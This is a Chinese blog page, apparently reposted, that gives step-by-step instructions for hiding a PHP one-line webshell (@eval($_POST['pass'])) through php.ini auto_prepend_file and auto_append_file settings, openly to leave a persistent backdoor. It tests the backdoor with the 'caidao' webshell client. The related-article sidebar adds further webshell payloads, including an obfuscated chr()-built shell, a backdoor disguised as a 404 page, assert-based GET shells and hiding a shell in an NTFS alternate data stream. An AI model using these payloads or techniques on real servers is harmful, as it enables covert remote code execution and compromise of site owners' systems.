php隐藏一句话,利用php.ini隐藏一句话

最新推荐文章于 2021-04-16 06:36:57 发布
最新推荐文章于 2021-04-16 06:36:57 发布
阅读量144 收藏
点赞数
文章标签: php隐藏一句话

利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。

在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下

Phpinfo();

?>

在本地打开如:http://127.0.0.1/info.php

检查系统使用的配置文件

2013108143734376.png

找到并编辑该配置文件

如下行:

auto_prepend_file =test.php  #自动将“test.php”中的内容增加到任意文件的页眉位置

auto_append_file =fuck.php  #自动将“test.php”中的内容增加到任意文件的页脚位置

如果是unix则修改如下两行

; UNIX: “/path1:/path2”

;include_path = “.:/php/includes”

我使用的是windows

; Windows: “\path1;\path2”

include_path = “E:\PHPnow-1.5.6\htdocs;.”#指定php 中的包含函数首先搜索的路径为“E:\PHPnow-1.5.6\htdocs”然后才是“.”即根。

在“E:\PHPnow-1.5.6\htdocs”创建名称(名称随意,上下保持一致即可)为“test.php”和“fuck.php”的脚本文件,其中包含最关键的一句话内容如下:

@eval($_POST[‘pass’]);      #pass 是密码

?>

使用caidao进行测试,如下:

2013108143735205.png

2013108143736185.png

2013108143736204.png

这样就可以完成使用“php.ini”达到留后门的目的

转自:http://www.hacktxt.com/article/sort012/sort0229/info-37653.html

誉儿他爸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
j7ur8#WebBook#usr.ini绕过1
07-25
如:所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell
php中eval函数的危害与正确禁用方法
01-20
对于php安全来说具有很大的杀伤力,因此一般不用的情况下为了防止类似如下的一句话木马入侵,需要禁止! <?php eval($_POST[cmd]);?> eval()使用范例: <?php $string = '杯子'; $name =...
利用php.ini隐藏一句话
weixin_34194379的博客
07-03 89
利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下<?phpPhpinfo();?>在本地打开如:http://127.0.0.1/info.php检查系统使用的配置文件找到并编辑该配置文件如下行:auto_prepend_file =test.php #自动...
无特征隐藏php一句话,【转】超级隐蔽的PHP一句话后门
weixin_39830387的博客
04-16 353
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:010203404 Not Found0405Not Found06The re...
php隐藏一句话,一个隐藏性很强的免杀pHp一句话
weixin_36275231的博客
03-17 194
?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[5...
PHP一句话
weixin_34054866的博客
12-20 2455
<?php @eval($_POST[pp]);?> 这是一段PHP木马代码,也就是我们所说的后门程序 为什么说这段代码是后门程序? 其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了, 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 就这一句话害死人,这样任何人都可以post...
如何将网站的php版本信息隐藏起来
huaweichenai的博客
01-03 344
当我们把网站上线之后,我们可以通过curl的如下命令显示指定网站的头信息,curl的安装方法参考:https://www.wj0511.com/site/detail.html?id=105 curl -I https://www.wj0511.com 如: 这时候可以看到如下信息 X-Powered-By: PHP/7.0.21 这样我们可以看到我们可以看到网站使用的php版本...
php函数传值的引用传递注意事项分析
12-19
网上查到资料有这么一句话: 在php5.3以上版本会出这个问题,应该也和php的配置有关,只要把这一句拆成两句就没有问题了。因为array_walk的参数是引用传递的,5.3以上默认只能传递具体的变量,而不能通过函数返回值...
Windows服务器中PHP如何安装redis扩展
01-20
一句话总结:下载扩展的dll,放入指定文件夹(php对应的扩展的目录php/ext),在配置文件php.ini中注册dll 尽量不要选择最新版php和redis扩展,下载时文件名的每一个字符尽量看懂意思 下载dll 放入php扩展插件文件夹...
一句话木马,.user.ini文件构成的PHP后门
jiet07的博客
08-27 865
环境:win10 工具:phpStudy,(warmsever 测试不行) 官网下载链接地址 先创建三个文件,如下图所示: 三个文件的内容: 启动Apache 测试结果
PHP一句话木马免杀(3)
小刚的博客
10-14 944
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结 免杀小技巧 1.ADS隐藏。 windows数据流有个很好的方式隐藏数据。 通过命令行 echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg 会在本地生成一个shell.php文件,但打开却发现没有内容.
深入浅出玩转php一句话(含过waf新姿势)
热门推荐
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
php变异一句话
黑面小窝
10-23 2062
第一种:1.php   在菜刀里写http://www.xxx.com /1.php?2=assert密码是1   第二种2.php   $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://www.xxx.com/2.php?_=asser
完美扫描PHP特殊一句话后门【转】
从这里找回被遗忘的东西
07-23 677
&lt;?php /********************** 作者 Spider 网上公布的各种PHP后门全军覆没 针对一些特殊变形的后门需要自己添加特征 误报率不到百分之一 **********************/ error_reporting(E_ERROR); ini_set('max_execution_time',20000); ini_set('memory_limit'...
php最新变异一句话
weixin_30765505的博客
11-15 102
第一种:1.php <?=($_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://www.xxxxx.net/1.php?2=assert密码是1 第二种2.php <? $_=”"; $_[+""]=”; $_=”$_”.”"; $_=($_[+""]|””).($_[+""]|”").($_[+""]^””); ?> &...
PHP一句话后门
xyang
05-26 3082
404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
php一句话怎么写_php最新变异一句话
weixin_32185607的博客
03-08 119
注释:站长的任务又加重了,好好认识下,以后见了好清除本来匿名发在土司上,现在应该传出去了,两个是来自国外的http://h.ackack.net/tiny-php-shell.htmlhttp://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/具体看国外的文章吧第一种:1.php=($_=@$_GET[2]).@$_($_...
php变种一句话,PHP一句话木马研究
weixin_30010599的博客
03-09 412
最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array_walk()array_walk_recursive()array_map()...
@php一句话猥琐流搞法
fengling132的专栏
04-20 1183
在渗透中常常遇到拦截eval的,所以 这种形式的会被拦截 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) 这种形式可以绕过,另外还有其他形式         今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。   完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
拷贝一份php.ini 命令
最新发布
06-10
拷贝一份 php.ini 文件可以使用以下命令: ``` cp /path/to/php.ini /path/to/new/php.ini ``` 其中,`/path/to/php.ini` 是原始的 php.ini 文件路径,`/path/to/new/php.ini` 是新的 php.ini 文件路径。可以根据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值